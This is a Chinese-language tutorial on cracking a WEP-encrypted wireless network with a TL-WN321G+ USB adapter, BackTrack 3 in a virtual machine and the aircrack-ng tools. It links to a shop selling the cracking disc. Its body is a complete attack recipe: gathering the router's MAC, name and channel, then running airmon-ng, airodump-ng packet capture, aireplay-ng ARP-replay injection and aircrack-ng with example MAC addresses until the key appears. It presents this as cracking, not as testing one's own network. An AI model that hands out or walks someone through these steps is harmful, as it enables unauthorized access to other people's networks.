本文方法不限于TL-WN321G+這塊網(wǎng)卡。其他網(wǎng)卡即可。之所以,使用這塊網(wǎng)卡,是淘寶此卡出貨量較大。且網(wǎng)上用虛擬機破解此網(wǎng)卡詳細教程較少。
pdf版本這里查看
http://www.docin.com/p-3424406.html
破解需要的光盤這里購買
http://zhangzhm.taobao.com/shop/xshop/wui_page-cat-33755369-122391710-QmFja1RyYWNr.htm?checkedRange=true
本文描述的方法是破解的整個過程。
其他高級的攻擊技術(無客戶端,只有ap。等情況),另作文章描述。
破解以前,需要獲得如下信息:
本機IP地址
無線路由器MAC地址
無線路由器名稱
無線網(wǎng)絡頻道號
1. 首先使用nerwork stumbler獲得以上信息。
自己網(wǎng)卡的信息通過ipconfig/all命令行查詢
1. 是無線路由的mac
2.是無線路由的名字
3.是無限網(wǎng)絡用到的頻道號
需要的信息我們基本上都有了。下載BT3,安裝虛擬機。
用虛擬機啟動下載的iso,使用usb網(wǎng)卡,直接在虛擬機上會認不出來。
只要將usb拔下來,重新插上即可。虛擬機一般認出來是rausb0
啟動虛擬機,開三個不同的shell,運行一下三個命令,等待密碼出現(xiàn)即可,剩下的就是等待
64位加密需要3萬加密數(shù)據(jù),128位需要10萬數(shù)據(jù)即可。
第一個shell:數(shù)據(jù)抓包
1. 先ifocnfig -a查看自己的網(wǎng)卡名稱
airmon-ng start rausb0 1
rausb0是自己的網(wǎng)卡名稱
1是頻道號
airodump-ng -c 1 --bssid 00:14:78:A2:BB:5C -w outputs rausb0
--bssid 無線路由MAC地址
鍵入此命令后,可以查看到1頻道中數(shù)據(jù)量,上面的data一直在走我們說的3萬數(shù)據(jù)包和10萬數(shù)據(jù)包就是指這個值。
第二個shell :產生數(shù)據(jù)
aireplay-ng -3 -b 00:14:78:A2:BB:5C -h 00:1d:0f:06:02:7f rausb0
-h 本機MAC地址
-b 無線路由MAC地址
第三個shell:破解
aircrack-ng -z -b 00:14:78:A2:BB:5C outputs.cap
然后等待密碼出現(xiàn)即可。當數(shù)據(jù)不足時,他會等待數(shù)據(jù)接收夠后,繼續(xù)破解。無需干預,只要等最后的密碼出現(xiàn)就好.